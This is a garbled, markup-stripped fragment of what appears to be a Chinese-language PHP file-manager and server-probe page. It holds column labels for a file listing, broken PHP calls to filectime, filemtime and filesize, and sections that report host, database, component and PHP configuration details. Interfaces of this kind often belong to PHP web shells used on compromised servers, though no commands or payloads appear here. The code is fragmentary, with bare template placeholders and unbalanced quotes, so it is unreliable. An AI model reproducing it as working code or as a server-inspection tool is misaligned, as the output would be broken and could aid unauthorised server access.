文件名	建立时间\|最后修改时间	大小(KB)	属性	操作
$bp [$lop_fname]	[$lop_fcdata\|$lop_fmdata]	$lop_fsize	$lop_ftype	$lop_foper
■ $lop_fname	[".@date("Y-n-d H:i:s",@filectime("$dir/$lop_fname"))."\|".@date("Y-n-d H:i:s",@filemtime("$dir/$lop_fname"))."]	".@number_format(@filesize("$dir/$lop_fname")/1024,3)."	".$lop_ftype."	$lop_foper
目录数:,文件数:
主机信息
{$sinfo[$i][0]}	{$sinfo[$i][1]}
数据库支持信息
{$ssql[$i][0]}	{$ssql[$i][1]}
组件和其他信息
{$sobj[$i][0]}	{$sobj[$i][1]}
自定义查看PHP配置参数(多个参数可用","逗号隔开)
请输入参数的ProgId或ClassId: + > + +
查询[{$envname[$i]}]如下:
Get_cfg_var方式	". my_func($envname[$i],1)."
function_exists方式	". my_func($envname[$i],2)."
Get_magic_quotes_gpc方式	". my_func($envname[$i],3)."
Get_magic_quotes_runtime方式	". my_func($envname[$i],4)."
Getenv方式	". my_func($envname[$i],5)."